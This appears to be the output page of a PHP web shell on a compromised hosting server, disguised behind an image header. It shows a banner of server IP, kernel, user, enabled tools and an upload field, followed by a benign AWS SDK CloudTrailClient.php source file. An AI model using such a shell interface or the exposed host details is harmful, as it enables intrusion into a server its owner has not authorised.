����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.82 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/vendor/aws/aws-sdk-php/src/CloudTrail/ |
Upload File : |
<?php namespace Aws\CloudTrail; use Aws\AwsClient; /** * This client is used to interact with the **AWS CloudTrail** service. * * @method \Aws\Result addTags(array $args = []) * @method \GuzzleHttp\Promise\Promise addTagsAsync(array $args = []) * @method \Aws\Result createTrail(array $args = []) * @method \GuzzleHttp\Promise\Promise createTrailAsync(array $args = []) * @method \Aws\Result deleteTrail(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteTrailAsync(array $args = []) * @method \Aws\Result describeTrails(array $args = []) * @method \GuzzleHttp\Promise\Promise describeTrailsAsync(array $args = []) * @method \Aws\Result getEventSelectors(array $args = []) * @method \GuzzleHttp\Promise\Promise getEventSelectorsAsync(array $args = []) * @method \Aws\Result getInsightSelectors(array $args = []) * @method \GuzzleHttp\Promise\Promise getInsightSelectorsAsync(array $args = []) * @method \Aws\Result getTrail(array $args = []) * @method \GuzzleHttp\Promise\Promise getTrailAsync(array $args = []) * @method \Aws\Result getTrailStatus(array $args = []) * @method \GuzzleHttp\Promise\Promise getTrailStatusAsync(array $args = []) * @method \Aws\Result listPublicKeys(array $args = []) * @method \GuzzleHttp\Promise\Promise listPublicKeysAsync(array $args = []) * @method \Aws\Result listTags(array $args = []) * @method \GuzzleHttp\Promise\Promise listTagsAsync(array $args = []) * @method \Aws\Result listTrails(array $args = []) * @method \GuzzleHttp\Promise\Promise listTrailsAsync(array $args = []) * @method \Aws\Result lookupEvents(array $args = []) * @method \GuzzleHttp\Promise\Promise lookupEventsAsync(array $args = []) * @method \Aws\Result putEventSelectors(array $args = []) * @method \GuzzleHttp\Promise\Promise putEventSelectorsAsync(array $args = []) * @method \Aws\Result putInsightSelectors(array $args = []) * @method \GuzzleHttp\Promise\Promise putInsightSelectorsAsync(array $args = []) * @method \Aws\Result removeTags(array $args = []) * @method \GuzzleHttp\Promise\Promise removeTagsAsync(array $args = []) * @method \Aws\Result startLogging(array $args = []) * @method \GuzzleHttp\Promise\Promise startLoggingAsync(array $args = []) * @method \Aws\Result stopLogging(array $args = []) * @method \GuzzleHttp\Promise\Promise stopLoggingAsync(array $args = []) * @method \Aws\Result updateTrail(array $args = []) * @method \GuzzleHttp\Promise\Promise updateTrailAsync(array $args = []) */ class CloudTrailClient extends AwsClient {}